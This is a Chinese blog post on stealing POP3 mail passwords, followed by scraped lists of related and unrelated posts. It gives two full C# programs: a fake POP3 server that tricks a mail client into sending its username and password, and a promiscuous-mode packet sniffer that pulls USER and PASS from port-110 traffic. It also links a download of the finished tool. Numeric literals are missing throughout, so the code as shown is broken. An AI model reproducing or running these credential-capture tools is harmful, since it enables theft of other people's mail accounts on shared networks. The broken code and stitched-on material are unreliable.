pop3密码嗅探
成品与代码可在 https://pan.baidu.com/s/1MPfU2T_6YN6mgxUL0wrZxw 下载
来说下pop协议,
英文版,https://tools.ietf.org/html/rfc1939
中文版,http://www.cnpaf.net/class/pop3/200408/122.html
pop 协议基于 tcp 协议,以明文ascii码的形式传输内容。且不区分大小写。
这里说下2种获取密码的方式:
- pop协议分析
- pop数据包分析
(一) pop协议分析
pop协议分析,就是伪造了一个邮件服务器,诱骗客户端传输密码,过程如下。

http://www.cnblogs.com/rr163/p/4209944.html 这位同学给了一个很好的demo.
里面写了个CAPA,开始与 POP3 Server 送出的第一个指令,用于取得此服务器的功能选项清单.
如果用FoxMail 客户端是没用这个的,如果用的outlook,会传输此命令。

代码 如下,就是复制别人的(^_^)。
using System;
using System.Net;
using System.Net.Sockets;
using System.Text; namespace ConsoleApplication1
{
class Program
{
static void Main(string[] args)
{
try
{
IPEndPoint ipEndPoint= new IPEndPoint(IPAddress.Parse("127.0.0.1"), );
TcpListener tcpServer = new TcpListener(ipEndPoint);
tcpServer.Start();
TcpClient tcpClient = tcpServer.AcceptTcpClient();
NetworkStream ns = tcpClient.GetStream();
byte[] outbytes = Encoding.ASCII.GetBytes("+OK Welcome" + Environment.NewLine); //服务器的欢迎
ns.Write(outbytes, , outbytes.Length);
byte[] userBytes = new byte[];//密码存储
ns.Read(userBytes, , userBytes.Length);
string capa = Encoding.ASCII.GetString(userBytes);//
if (capa.IndexOf("CAPA") >= )//开始与 POP3 Server 送出的第一个指令,用于取得此服务器的功能选项清单
{
byte[] capaByteArr = Encoding.ASCII.GetBytes("" + Environment.NewLine);
ns.Write(capaByteArr, , capaByteArr.Length);
ns.Read(userBytes, , userBytes.Length);
}
outbytes = Encoding.ASCII.GetBytes("+OK" + Environment.NewLine);
ns.Write(outbytes, , outbytes.Length);
byte[] pwdBytes = new byte[];
ns.Read(pwdBytes, , pwdBytes.Length);
string user = Encoding.ASCII.GetString(userBytes).Replace("USER", "").Replace("\r\n", "").Replace("\0", "");
string pass = Encoding.ASCII.GetString(pwdBytes).Replace("PASS", "").Replace("\r\n", "").Replace("\0", "");
tcpClient.Close();
Console.WriteLine(string.Format("用户名:{0}\r\n密 码:{1}",user,pass));
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
Console.ReadKey();
}
}
}
然后设置下pop的服务器为127.0.0.1。 端口110,非加密传输。

收发下邮件,结果如下

(二)pop数据包分析(这里讲的多)
Pop3是基于TCP协议的,那来说说它的结构。以太网包头+IP包头+TCP/UDP+内容 4部分构成。

四种以太网数据包详解
Ethernet II协议,(pop3用的这个)
Ethernet 802.2协议,
Ethernet 802.3协议(IPX/SPX协议)
Ethernet SNAP协议,
说下POP3的数据包。
Ethernet II协议部分, 由6字节目标mac地址,6字节源mac地址,2字节协议类型构成,共14个字节
IP协议部分,由20个固定字节与40个可变字节构成,内容太多,大家去百度就好。IP地址就在这里,POP3里没有扩展内容,所以就是固定20字节。
TCP协议部分,依然是20个固定字节作为首部,TCP报文首部的最大长度是 80字节。选项部分为MSS( Maximum Segment Size 最大报文段长度,以太网默认为1460)。MSS=TCP报文段长度-TCP首部长度,所以1460不是确定值。

这里有源端口号与目的端口号(占2字节)分别是目的端口号(占2字节),就在头文件里。
。
内容部分,就是ascii码。
来说思路:
1. 只查看端口为110的包.(为因默认在第38个字节)
2. 如有”USER”的包记录下用户名,如果有”PASS”的包,记录为密码。
这里用的是C#语言,SharpPcap,可以在https://sourceforge.net/projects/sharppcap/下载。
需要安装wincap(百度下就能下载到)。
引用PacketDotNet.dll,SharpPcap.dll。 结果如下。

代码如下:
using System;
using System.Text;
using SharpPcap;
using SharpPcap.LibPcap; namespace ConsoleApplication2
{
class Program
{
static string userName = string.Empty;
static CaptureDeviceList devices = CaptureDeviceList.Instance;
static ICaptureDevice device;
static void Main(string[] args)
{
try
{
getAdapter();
Console.WriteLine("");
Console.Write("请选择网卡编号:");
string macIndexStr = Console.ReadLine(); int macIndex = int.Parse(macIndexStr);
Console.WriteLine("编号为:"+macIndex+",开始监听...");
devices = CaptureDeviceList.Instance;
device = devices[macIndex];
device.OnPacketArrival += new SharpPcap.PacketArrivalEventHandler(device_OnPacketArrival);
int readTimeoutMilliseconds = ;
device.Open(DeviceMode.Promiscuous, readTimeoutMilliseconds);
device.StartCapture(); }
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
Console.ReadKey();
}
private static void getAdapter()//获取网卡
{
int macIndex = ;
var devices = LibPcapLiveDeviceList.Instance;
//var devices = WinPcapDeviceList.Instance;
//var devices = CaptureDeviceList.Instance;
if (devices.Count < )
Console.WriteLine("此设备上没有网卡");
else
foreach (var dev in devices)
{
Console.WriteLine(macIndex + "." + dev.Interface.FriendlyName);
macIndex++;
}
}
private static string HexArrToAscii(byte[] s)
{
StringBuilder sb = new StringBuilder();
foreach (byte b in s)
{
char c = (char)b;
if (!char.IsControl(c))
{
sb.Append(c);
}
else
{
sb.Append('.');
}
}
return sb.ToString();
}
private static void device_OnPacketArrival(object sender, CaptureEventArgs e)
{
var pData = e.Packet.Data;
if (pData.Length >= )
{
if (pData[] != ) //如果不是110 端口,则不记录
{
return;
}
}
string hexStr = HexArrToAscii(pData);
char[] packetArr = hexStr.ToCharArray();
if (packetArr.Length >= )
{
for (int i = ; i < packetArr.Length - ; i++)
{
if (packetArr[i] == 'U' && packetArr[i + ] == 'S' && packetArr[i + ] == 'E' && packetArr[i + ] == 'R')
{
int passLength = packetArr.Length - i - - ; //i + 3长度是数据包头,2长度是控制符
char[] userArr = new char[passLength]; for (int j = ; j < passLength - ; j++)
{
userArr[j] = packetArr[i + + j + ];
}
string resultPass = new string(userArr);
userName = resultPass;
}
}
}
if (!string.IsNullOrEmpty(userName) && packetArr.Length >= )
{
for (int i = ; i < packetArr.Length - ; i++)
{
if (packetArr[i] == 'P' && packetArr[i + ] == 'A' && packetArr[i + ] == 'S' && packetArr[i + ] == 'S')
{
int passLength = packetArr.Length - i - - ;//i + 3长度是数据包头,2长度是控制符
char[] passArr = new char[passLength]; for (int j = ; j < passLength - ; j++)
{
passArr[j] = packetArr[i + + j + ];
}
string resultPass = new string(passArr);
Console.WriteLine();
Console.WriteLine(string.Format("用户名:{0}\r\n密 码:{1}", userName, resultPass));
return;
}
}
}
}
}
}
pop3密码嗅探的更多相关文章
- 论坛IP地址追踪&路由器密码嗅探
一.论坛IP地址查询 1.任何应用程序部可以调用一个标准的库函数来查看给定名称的主机IP地址.类似地,系统还提供一个逆函致—给定主机的IP地址,查看它所对应的主机名.大多数使用主机名作为参数的应用程序 ...
- [源码]python Scapy Ftp密码嗅探
[源码]python Scapy Ftp密码嗅探 原理很简单,FTP密码明文传输的 截取tcp 21端口User和Pass数据即可 Scapy框架编译程序较大(一个空程序都25M),所以就不提供exe ...
- 密码嗅探工具dsniff
密码嗅探工具dsniff 网络大量的服务都使用密码方式对使用者身份进行认证.如果使用非加密的方式传输,一旦数据被截获,就容易被嗅探到.Kali Linux预置了一款专用的密码嗅探工具dsniff. ...
- metasploit framework(七):密码嗅探
run 当嗅探到流量中的用户密码信息时打印出来,目前只支持FTP,http get , pop3 还可以对抓包文件,进行密码提取,设置需要提取的文件路径 run就能提取里面的用户密码信息 查看和停掉某 ...
- pop协议,邮件密码嗅探 使用说明
思路与源代码 可以查看 https://www.cnblogs.com/likehc/p/10140174.html 因为软件用的是Wincap,所以 第一步安装下 WinPcap 第二步,打开 sn ...
- kali 局域网嗅探
1.局域网图片嗅探 工具 arpspoof arpspoof -i eth0 -t 192.1681.10(网卡 目标地址) 192.168.1.1 局域网网关,如果在Windows中可以使用局域网 ...
- 中间人攻击之ettercap嗅探
中间人攻击: 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的 ...
- kali上密码工具使用例如mudusa,hydra等
思路 各种密码类别大致数学原理 https://blog.csdn.net/carol980206/article/details/96705859 https://www.jianshu.com/p ...
- C#编程让Outlook乖乖交出帐户密码
许多人习惯于让Outlook记住密码,收邮件时便不必每次都输入邮箱密码,一切让Outlook代劳.但时间一长,马虎的人会把自己的邮箱密码忘记,这样就无法重新设置或者登录Web界面收取邮件了.Outlo ...
随机推荐
- 正经学C#_判断[switch语句]:[c#入门经典]
switch是一个和IF语句极其相似的语句.但是Switch允许条件可以有多个值. 程序的基本结构如下 switch(textVal) { case Val: 程序代码 break case Val2 ...
- angular原理及模块简介
Angular简介(大神可略过) Angular是一个强大的前端框架,其强大之处主要是可以把静态页面与动态数据绑定起来.平时我们看到的网页界面上面的数据都是固定,但如果我们要变化这些数据,例如我在一个 ...
- 【火车出栈】ZOJ - 2603 Railroad Sort
好久没写递归了,怕手生再来练练手. 题意:车轨上有上图所示的n个中转栈,现有2n个列车,给出列车初始编号序列.列车从最右边驶入车轨,并且列车只能从右向左移动,要求给出列车中转操作序列,使列车经过这n个 ...
- 最长回文串:LeetCode:Longest Palindromic Substring
class Solution { public: string longestPalindrome(string s) { int length=s.length(); ; ; ][]={false} ...
- 数据结构4:顺序表(线性表的顺序存储结构)及C语言实现
逻辑结构上呈线性分布的数据元素在实际的物理存储结构中也同样相互之间紧挨着,这种存储结构称为线性表的顺序存储结构. 也就是说,逻辑上具有线性关系的数据按照前后的次序全部存储在一整块连续的内存空间中,之间 ...
- SPI 实现原理及运用
SPI原理 SPI的全名为Service Provider Interface.大多数开发人员可能不熟悉,因为这个是针对厂商或者插件的.在java.util.ServiceLoader的文档里有比较详 ...
- 2-29 while
do while for
- ueditor chrome bug
一.概述: 关于UEditor在谷歌浏览Chrome打开选择指上传图片,发现[点击选择图片]时无法立即弹出选择框,而是等4-7秒钟才显示出来的BUG,试了N多方法,改层级都用了,也无效.在网上找到了一 ...
- Luogu P4404 [JSOI2010]缓存交换 优先队列
细节题?...调了半天.... 可以发现,每一次从缓存中删除的主存一定是下次访问最晚的,可以用优先队列来处理...还有要离散化...还有链表末尾要多建一些点...否则会死的很惨... #include ...
- D - Frogger
Freddy Frog is sitting on a stone in the middle of a lake. Suddenly he notices Fiona Frog who is sit ...